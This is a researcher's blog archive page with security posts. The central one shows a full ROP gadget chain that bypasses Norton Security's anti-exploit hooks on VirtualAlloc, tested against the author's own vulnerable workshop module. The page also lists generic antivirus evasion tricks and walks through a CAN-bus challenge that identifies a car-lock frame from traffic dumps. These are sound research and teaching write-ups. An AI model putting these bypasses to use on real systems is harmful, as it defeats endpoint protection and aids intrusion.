<li>If you could use Win10 Device<span style="font-family: "nokia sans" , sans-serif; text-indent: -24px;">Guard </span> and control all binaries/scripts - it probably gives you better end-point security ;) </li>
</ul>
<div>
<br /></div>
</div>
<div>
<b>UPD</b><br />
<br />
Most typical NextGen "fails":</div>
<div>
<ul style="text-align: left;">
<li>"Corrupted" PE -> bypass checks/binary parsers</li>
<li>EXE detected, but same product can't detect same malware in DLL...</li>
<li>DLL detected, but same product can't detect same malware in EXE...</li>
<li>Ring3 hooks (already mentioned, https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html )</li>
<li>No signature checks... ok, but only VirusTotal hashes?</li>
<li>IE->exec(CMD) - detected! IE->migrate(EXPLORER)->exec(CMD) - not</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSRL9-hLhH6QXc4xyggPioV9Vpm1k7NZ_Mxz76S27UUCqv_-MocVQxoV_k6hD_jAIOq3oU7vvWXA8Gtg1yaeLQkOkNDlF4u7MV0m0pcg4jlqvG_xtaXcpoxV4EspMUVXFMycBgmEZJmeZ/s1600/byapss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSRL9-hLhH6QXc4xyggPioV9Vpm1k7NZ_Mxz76S27UUCqv_-MocVQxoV_k6hD_jAIOq3oU7vvWXA8Gtg1yaeLQkOkNDlF4u7MV0m0pcg4jlqvG_xtaXcpoxV4EspMUVXFMycBgmEZJmeZ/s400/byapss.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
I checked, @matalz is right... delays also works! lol...</div>
<div>
<br />
P.S. All vendors will fix at least things I reported, and they were very promising on new features. They not bad 8)</div>
<div>
<br /></div>
</div>
</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-77187676965365830372016-12-16T17:45:00.000-08:002017-01-11T17:50:40.967-08:00Bypassing Exploit protection of NORTON Security<div dir="ltr" style="text-align: left;" trbidi="on">
Hey, today I am not going to talk about CANToolz! Surprise 8)<br />
<br />
Let me start this story from the beginning - I just got a new laptop, and by default there was installed a <b>Norton Security</b>. And I have 60 days evaluation time. And this is ok (except that part when Norton have decided to delete my <b>Radare2, </b>that was awful... ). <br />
<br />
One day I have decided to test my old <b>Zeronights 2012 workshop </b> about x86 exploitation (<a href="http://www.slideshare.net/DefconRussia/sintsov-advanced-exploitation-in-win32">http://www.slideshare.net/DefconRussia/sintsov-advanced-exploitation-in-win32</a>). And I was surprised that <b>Norton</b> have stopped my UAF exploit... good job! (if you interested in that lab, you can get it here: <a href="https://github.com/defcon-russia/activex_workshop/tree/master/Use_After_Free_x32">https://github.com/defcon-russia/activex_workshop/tree/master/Use_After_Free_x32</a>)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1CupUKgRPXwYeVVMvvrnPl4n86OIATXdttKXZAOh1n-GQRBq7oUX8ebCNVgH2ijldrGHeF9fBw2hWxuD7FuBfTboZFhBxE1Xc4oZcd_JAa6g7uyr_9R4VjwP3b3Yc3NQmcRWHKSYMEl3h/s1600/block.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1CupUKgRPXwYeVVMvvrnPl4n86OIATXdttKXZAOh1n-GQRBq7oUX8ebCNVgH2ijldrGHeF9fBw2hWxuD7FuBfTboZFhBxE1Xc4oZcd_JAa6g7uyr_9R4VjwP3b3Yc3NQmcRWHKSYMEl3h/s640/block.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
But it was interesting for me - how it works and how we could bypass it... And then I have started playing with it online - while streaming this on our TWICH (h<a href="ttps://www.twitch.tv/defconrussia">ttps://www.twitch.tv/defconrussia</a>, sorry Russian lang), so my friends from <b>Defcon-Russia</b> (<b>DC 7812</b>) could do it with me online 8)<br />
<br />
First finding: Norton could detect only StackPivots, and it's done with help of ring3 hooks on critical functions, like LoadLibrary, VirtualProtect and VirtualAlloc. So they have injected their JUMPS in function's prologue and intercept all calls. In their handler they can check if current stack frame is "original". If not, then they raising an exception like on that screenshot. So if during exploit there are no Stack Pivotings happened (let's say simple BoF where ROP and shellcode in the same stack) then attack will be not stopped and detected.<br />
<br />
Let's see their hooks on VirtualAlloc where my ROP shellcode fails after StackPivot:<br />
<br />
First hook is in the kernel32 wrapper and then second hook in kernelbase:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipd6i97irLaPmjHW1_teiU1n89PdQAYNrE7ZDkRmzFqHDidq8ISk9ShaZLzN73WNS_0z7BdknXo-LGXyTtcTjiSpMWQ5eEfqo8ZNlBzODZi4655_IG23fpsrlQbIgmHXUGrSPJLLyOqpFB/s1600/hook1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipd6i97irLaPmjHW1_teiU1n89PdQAYNrE7ZDkRmzFqHDidq8ISk9ShaZLzN73WNS_0z7BdknXo-LGXyTtcTjiSpMWQ5eEfqo8ZNlBzODZi4655_IG23fpsrlQbIgmHXUGrSPJLLyOqpFB/s640/hook1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
This could be bypassed via different methods for example attacker could copy ROP shellcode with VirtualAlloc call into original stack with help of stage1 ROP shellcode and than switch "original" stack frame back, or he could bypass hooks by restoring function's prologue and jump over the hook. During the stream we decided to try both strategies just for fun:<br />
<br />
1) ROP shellcode will bypass VirtualAlloc via jumps over two hooks.<br />
2) Then normal shellcode will restore original stack frame and execute LoaldLibrary and other functions without any exceptions.<br />
<br />
BTW, when I started this activity, <a href="https://twitter.com/matrosov">@matrosov</a> told me about their research, where this topic was covered as well: <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf">https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf</a> So topic is a really well-known problem! And looks like guys from Symantec (and not only, others Security vendors also have same issues) already aware about this.<br />
<br />
<h4 style="text-align: left;">
Bypassing two hooks in ROP's VirtualAlloc call:</h4>
My original exploit have leaked pointer to VirtualAlloc call from kernel32, If we want to bypass these hooks, we need to call VirtualAlloc from kernelbase, and we need to "jump" on that address with offset in 5 bytes from the beginning. Directly on first "push ecx".<br />
We did it like that:<br />
esi <- VirtualAlloc pointer<br />
<br />
So we build ROP that doing:<br />
<br />
mov eax, [esi + 8] ; read kernelbase.virtualalloc pointer<br />
mov eax, [eax] ; get this pointer<br />
add eax, 5 ; get pointer over the hook, directly to first "push ecx" <br />
<br />
But you could not do "jmp eax", because prologue of kernelbase.VirtualProtect was "overwritten" by hook, so first you need to restore original EBP value (because this register is used as a pointer for parameters)<br />
<br />
lost VirtualAlloc prologue:<br />
<br />
push ebp<br />
mov ebp, esp<br />
<br />
So we need to be sure that at the moment of the jump we will have pre-calculated EBP value that will be equal to ESP. It is mean that we need to do mov ebp,esp just before we will do "jmp eax". Then hook will be bypassed. Of course when you do it via ROP it is a little bit more difficult, because ROP always changes ESP pointer. But finally we did it (ROP for my vulnerable workhsop ActiveX module, ASLR enabled, so addresses here just for an example):<br />
<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">1) This is ROP shellcode after stack pivot, we have original stack pointer stored in EDI</span><br />
<span style="font-size: x-small;">2) Let's pre-calc EBP (EBP should be same as ESP when VirtualAlloc will be called)</span><br />
<br />
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf2b484 : # POP EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>204 : # offset to EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be63cd8 : # PUSH ESP # POP EBP # RETN 04 </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf014a9 : # XCHG EAX,EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x90909090 : # TRASH</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf014a9 : # XCHG EAX,EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">3) Here we want to calc address of VirtuallAlloc in kernelbase after all Norton's hooks</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"># EAX = kernelbase.virtalloc + offset_over_the_hook</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee1907 : # POP ECX # RETN [npexploitMe.dll] </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf32114 : # ptr to &VirtualAlloc() [IAT npexploitMe.dll]</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bed6fb0 : # MOV EAX,DWORD PTR DS:[ECX] # RETN [npexploitMe.dll]</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bedba6d : # ADD EAX,8 # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be629f9 : # MOV EAX,DWORD PTR DS:[EAX] # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be629f9 : # MOV EAX,DWORD PTR DS:[EAX] # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">4) Prepare parameters for VirtualAlloc</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf20010 : # XCHG EAX,ESI # RETN ; save VA in ESI</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be8936f : # XOR EAX,EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN ; EAX=EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bed87dd : # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> ; EDX = EBP, pointer to place where we want to store our VA parameters</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x11223344 : # trash to esi</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf20010 : # XCHG EAX,ESI # RETN ; save VA in ESI</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be98313 : # MOV EAX,ESI # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; save VA call address (1)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN ; DWORD* pointer++</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; not needed, new EBP (2)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf2b484 : # POP EAX # RETN ; put return address after VA call int EAX </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be63ce2 : # PUSH ESP # RETN ; this will be executed after VA (goes to EAX right now)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; Retuen address (3)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be8936f : # XOR EAX,EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN ; EAX=EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; pointer to page (4)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN ;fixing EBP, so now it is equal to ESP, prologue restored...</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809b : # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x11111111 : # This will be overwritten by (1)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x22222222 : # This will be overwritten by (2)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x22222222 : # Retuen address after VA call, will be overwritten by (3)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x33333333 : # First VA parameter - pointer, overwrittem by (4)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00000001 : # Second VA parameter: size </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00001000 : # Third VA parameter: AllocationType = MEM_COMMIT </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00000040 : # Last VA parameter: R_X </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
After that normal shellcode can be executed from R_X memory. We still have the original stack frame pointer in EDI, we did not use this register during ROP, so now shellcode could restore original stack frame (second strategy) and continue execution without problems from Norton Security:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
mov esp, edi</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now we have bypassed this protection and able to execute our code for the workshop exploit with no problems. Too simple. And this tricks are kind universal and will work in most setups (like same ROP and shellcode will be executed same way on boxes without Norton, and with Norton, so attacker will not need two different payloads/shellcodes)</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
P.S.</div>
<div style="text-align: left;">
For me it was funny to stream this small ans simple "research" and I got a lot of help from the community, finally we all had fun time and learned about security something.</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com25tag:blogger.com,1999:blog-4711612808026791519.post-64237819016492849452016-05-30T08:36:00.003-07:002016-05-31T05:32:00.816-07:00PHDays: CAR4ALL challenge (part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
CAN reversing with CANToolz</h2>
<div>
<br /></div>
<div>
<a href="http://www.phdays.com/">PHDays</a> happened on May 17-18, in Moscow. It was a really great event and I believe PHDays is one of the best IT-Security event in Russia (but of course <a href="http://zeronights.org/">Zeronights </a>is the best of the best). And during this event there was a small CAR/CAN-quest prepared by my friends and my small support (as CANToolz developer). Here I want to do a small write-up about it. </div>
<div>
<br /></div>
<div>
On first day of the conference we had "offline" task with real CAN dumps. Those who solved this task got access to the second level on second day of the conference. And this second task was based on a real vehicle that was parked inside main venue. But let's talk more detailed.<br />
<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihS-5Qzc_lKoWx17IIt0QLRTWihWdTi3qsa5uxUYsy3RWLx3TNc7su6Px6uFXuUrj_skc6RmD8GYklnsxAP8GAV8ssFHJ3e4hxu3L_zU7KSWGlDmRc2fbHwm3KaJiExq92-0-nq18pzfVe/s1600/pic1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihS-5Qzc_lKoWx17IIt0QLRTWihWdTi3qsa5uxUYsy3RWLx3TNc7su6Px6uFXuUrj_skc6RmD8GYklnsxAP8GAV8ssFHJ3e4hxu3L_zU7KSWGlDmRc2fbHwm3KaJiExq92-0-nq18pzfVe/s1600/pic1.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: right;">
_Saplt, _j0hnni3 and @Z0ha4</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thx to HardwareVillage and team: Michael Elizarov (<a href="https://twitter.com/_Saplt" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@_Saplt</a>), <a href="https://twitter.com/Z0ha4" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@Z0ha4</a><span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; line-height: 25.6px;">, Anton Sysoev and </span><span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; line-height: 25.6px;"> </span><a href="https://twitter.com/_j0hnni3" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@_j0hnni3</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
----></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a name='more'></a><br />
<br />
<h3 style="clear: both; text-align: left;">
1st TASK</h3>
<div>
<br />
<blockquote class="tr_bq">
</blockquote>
<span style="font-family: "courier new" , "courier" , monospace;">You have two DUMPS of CAN traffic: NOISE and EVENT, EVENT dump contains event of locking vehicle. Based on this two dumps please answer on following questions:<br /><br />1) Which CAN frame (ID, DATA) allows to lock the car<br />2) Which CAN frames (ID) tell us about doors statues (find at least two)<br />3) What type of vehicle is it (vendor/)?</span><br />
<br />
<b>DUMPS:</b><br />
<br />
<a href="http://canoctopus.ru/upload/NOISE.dump">NOISE</a> - dump of the CAN traffic from the car for 1 minute. Engine turned on. No Actions<br />
<a href="http://canoctopus.ru/upload/LOCK_ACTION.dump">EVENT</a> - dump of the CAN traffic from the car during lock event enabled. Engine turned on.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>SOLUTION:</b><br />
<br />
This task supposed to be simple and funny (fast filter to limit access to real vehicle on the second day only to those who really want to play). Let's start from first part of the task: how to find control frame which do a car-lock. Dump files have simple format: ID:LENGTH:DATA_IN_HEX so you can write a simple script to parse it or use CANToolz (this is format of REPLAY module of CANtoolz). First of all what we want: load DUMP files and replay it to <b>mod_stat</b> module for future analysis. For that we need simple config file (first_config.py):</div>
<div style="text-align: left;">
<br /></div>
<div>
<pre style="background-color: white; font-family: 'Courier New'; font-size: 9.6pt; text-align: left;"><span style="color: grey; font-style: italic;"># Load modules</span>load_modules = {
<span style="color: teal; font-weight: bold;">'mod_stat' </span>: {},
<span style="color: teal; font-weight: bold;">'gen_replay' </span>: {}
}
<span style="color: grey; font-style: italic;"># Scenario</span><span style="color: grey; font-style: italic;">
</span>actions = [
{<span style="color: teal; font-weight: bold;">'gen_replay' </span>: {<span style="color: teal; font-size: 9.6pt; font-weight: bold;">'pipe'</span><span style="font-size: 9.6pt;">: </span><span style="color: blue; font-size: 9.6pt;">1</span><span style="font-size: 9.6pt;">}}, </span><span style="font-size: 9.6pt;"><span style="color: grey;"><i># REPLAY
</i></span></span><span style="font-size: 9.6pt;"> {</span><span style="color: teal; font-size: 9.6pt; font-weight: bold;">'mod_stat' </span><span style="font-size: 9.6pt;">: {</span><span style="color: teal; font-size: 9.6pt; font-weight: bold;">'pipe'</span><span style="font-size: 9.6pt;">: </span><span style="color: blue; font-size: 9.6pt;">1</span><span style="font-size: 9.6pt;">}} </span><span style="font-size: 9.6pt;"><span style="color: grey;"><i># Analyze
</i></span></span><span style="font-size: 9.6pt;">]</span></pre>
<div style="text-align: left;">
<br /></div>
<div>
<br /></div>
Also put files with dumps into CANToolz root directory (noise.dump, event.dump). Now we are ready, let's start <b>CANToolz: </b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><i>python -g w -c first_config.py</i></span><br />
<br />
Then just use web-browser: http://localhost:4444/index.html</div>
<div>
<br /></div>
<div>
As result you will see CANToolz's web interface and two modules loaded: gen_replay and mod_stat.<br />
Click on mod_replay and load noise dump. Then press START. Now you have noise dump loaded and ready for replay. If you click "replay" then all those frames will be replayed through CANToolz and will be sniffed by <b>mod_stat </b>(as a next module on the same PIPE). </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNGhG9_EtHfSRh6U2oQ_OcykjSR6zQf09GDmE6qoHa3XpcQsL99gx9pz0rqdqBJNl4PgJEu-xugNUehRUUO0sf9ZIuCKx9OijQP6WItDEpTjRYGA80VCAOkGEnrf3zWEDzD3iHj7SgEX3/s1600/pic2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNGhG9_EtHfSRh6U2oQ_OcykjSR6zQf09GDmE6qoHa3XpcQsL99gx9pz0rqdqBJNl4PgJEu-xugNUehRUUO0sf9ZIuCKx9OijQP6WItDEpTjRYGA80VCAOkGEnrf3zWEDzD3iHj7SgEX3/s1600/pic2.png" /></a></div>
<div>
<br /></div>
<div>
Now we need to switch sniffing buffer in <b>mod_stat </b>to another index. For that click on mod_stat control, and then click <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Switch sniffing to a new buffer"</span>. After that we can go back to <b>gen_replay</b>, clean it, load event.dump and replay it. As result in <b>mod_stat</b> we will have<b> </b>two buffers with replayed CAN traffic. In first buffer (index 0) we have noise dump, in second (index 1) we have event traffic. Now we can try to do a simple diff: Arbitration ID that exists in the second set but not in the first. In other words: which CAN frames are uniquely in second dump (by arbitration ID). For that diff. just press <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Print Diff between two buffers (new ID only)"</span><span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">.</span></div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbrT_Rs_VPWsUrL4JNx2eCgJlQ0ewciVO2yI3OFzEZEOWGABVYDb_TVQpQbvAGG21pBlI9BLtdGn8PbpqPsHmutGTYx3gIJUVWLeKzVa3Na81zRu6TRuYEYQo1a6dxl0lBJfvWtRdqLuZg/s1600/pic3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbrT_Rs_VPWsUrL4JNx2eCgJlQ0ewciVO2yI3OFzEZEOWGABVYDb_TVQpQbvAGG21pBlI9BLtdGn8PbpqPsHmutGTYx3gIJUVWLeKzVa3Na81zRu6TRuYEYQo1a6dxl0lBJfvWtRdqLuZg/s1600/pic3.png" /></a></div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div>
With very high probability this is our answer on the first question of the task (<b>0xef81296:2:0100</b>). Why? Because this frame "fired" once during the event and have not been seen before (on real car, you can validate this by sending this command and check if car was really locked, but here on this test you can see that there are no other frames that looks like "command"). As you can see this is work of 3 minutes. So this is first part of our answer. But how to answer on the second question: <span style="font-family: "courier new" , "courier" , monospace;">Which CAN frames (ID) tell us about doors statues (find at least two)</span>? </div>
<div>
<br /></div>
<div>
Idea with "status" frames also kind of simple. If we "<b>0xef81296</b>" control frame that changes status then it means, that just after this frame "statuses" of door should be changed. Then we could try to find this in the second buffer: check all messages before <b>0xef81296 </b>and then after. If in those frames "after" event value has been changed: then it could be our "door statuses" data. This feature was not developed in CANToolz and not available during PHDays. So I am happy that at least one person (<a href="https://twitter.com/glukyne">Dr.Glukyne</a>) were able to understand this logic and develop a script to parse dump and find changes in the traffic after "control" frame have been sent. Right now this feature (as experimental) has been added into <b>CANToolz 3.3.3</b>, so no needs in manual scripting. But even without this feature in CANToolz you can get those "statuses" frames. The answer is in <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Print Diff between two buffers". </span>This time it was possible to do during PHDays via CANtoolz. Main idea in this scenario - that "statuses" frames are also exists in "noise" dump, and have been changed only in event dump (after "control" frame, but here this does not matter). We will do a diff between two buffers but not by Arbitration ID, but by CAN frame's data. For that we will put parameters: <b>0, 1, 2. </b>(see screenshot below)<br />
<br />
0 - Index of buffer for noise diff.<br />
1 - Index of buffer for event diff<br />
2 - filter: max count of different values. We set two, because we believe that in noise it was one value, and after "control" frame was sent it changed to another. So maximum we will have two different values.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSafk8Y3x92cJSrpTOvNKa8qWQt_2c5BECy1ylIczuVMA8IDg5IecddTIUxAKQNFno91rbMDzLVQuGZPwtLMnkOTa-BXMD_PnSRkJE2DTAX_rOjzXd4mN5-6uBcFiT1AweX9nlQIxeJXw/s1600/pic4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSafk8Y3x92cJSrpTOvNKa8qWQt_2c5BECy1ylIczuVMA8IDg5IecddTIUxAKQNFno91rbMDzLVQuGZPwtLMnkOTa-BXMD_PnSRkJE2DTAX_rOjzXd4mN5-6uBcFiT1AweX9nlQIxeJXw/s1600/pic4.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Also you can see that we check this with <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Search ID in all buffers" </span>and see exactly what have been changed in data. But as I told in version 3.3.3 I have implemented idea of <b>Dr. Glukyne</b>, let's check and compare results for both methods:</div>
<div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r1ICM2BMPgTdDMJotIDR-D8DTnMun4NMcrWFkEMrAQBXxh23EI1n_GDtc6queuCws2JxVHK1AaNxqvhkMWvPLespIb7gheFLsSw7tMnzxe71GlbYT9LWuXXme8ZkuQET8yWBlflaXcXz/s1600/pic5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r1ICM2BMPgTdDMJotIDR-D8DTnMun4NMcrWFkEMrAQBXxh23EI1n_GDtc6queuCws2JxVHK1AaNxqvhkMWvPLespIb7gheFLsSw7tMnzxe71GlbYT9LWuXXme8ZkuQET8yWBlflaXcXz/s1600/pic5.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
